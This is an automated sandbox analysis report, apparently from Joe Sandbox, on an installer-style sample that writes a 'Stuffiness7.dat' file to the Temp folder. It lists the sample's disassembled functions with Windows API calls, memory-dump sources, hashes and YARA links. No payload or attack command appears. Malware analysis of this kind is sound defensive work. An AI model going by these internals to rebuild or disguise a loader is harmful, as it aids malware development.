                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 642 401389-40138e 643 4013fa-4013fc 642->643 644 401390-4013a0 643->644 645 4013fe 643->645 644->645 646 4013a2-4013ad call 401434 644->646 647 401400-401401 645->647 650 401404-401409 646->650 651 4013af-4013b7 call 40136d 646->651 650->647 654 4013b9-4013bb 651->654 655 4013bd-4013c2 651->655 656 4013c4-4013c9 654->656 655->656 656->643 657 4013cb-4013f4 MulDiv SendMessageW 656->657 657->643
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405672 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405682
                                                                                                                                                                                                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000,?,00000000,?), ref: 004056CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2896919175-0
                                                                                                                                                                                                                                • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                                                                                                                                                                                                • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                                                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C248,?,?,00406438,0042C248,00000000,?,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?), ref: 004063CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
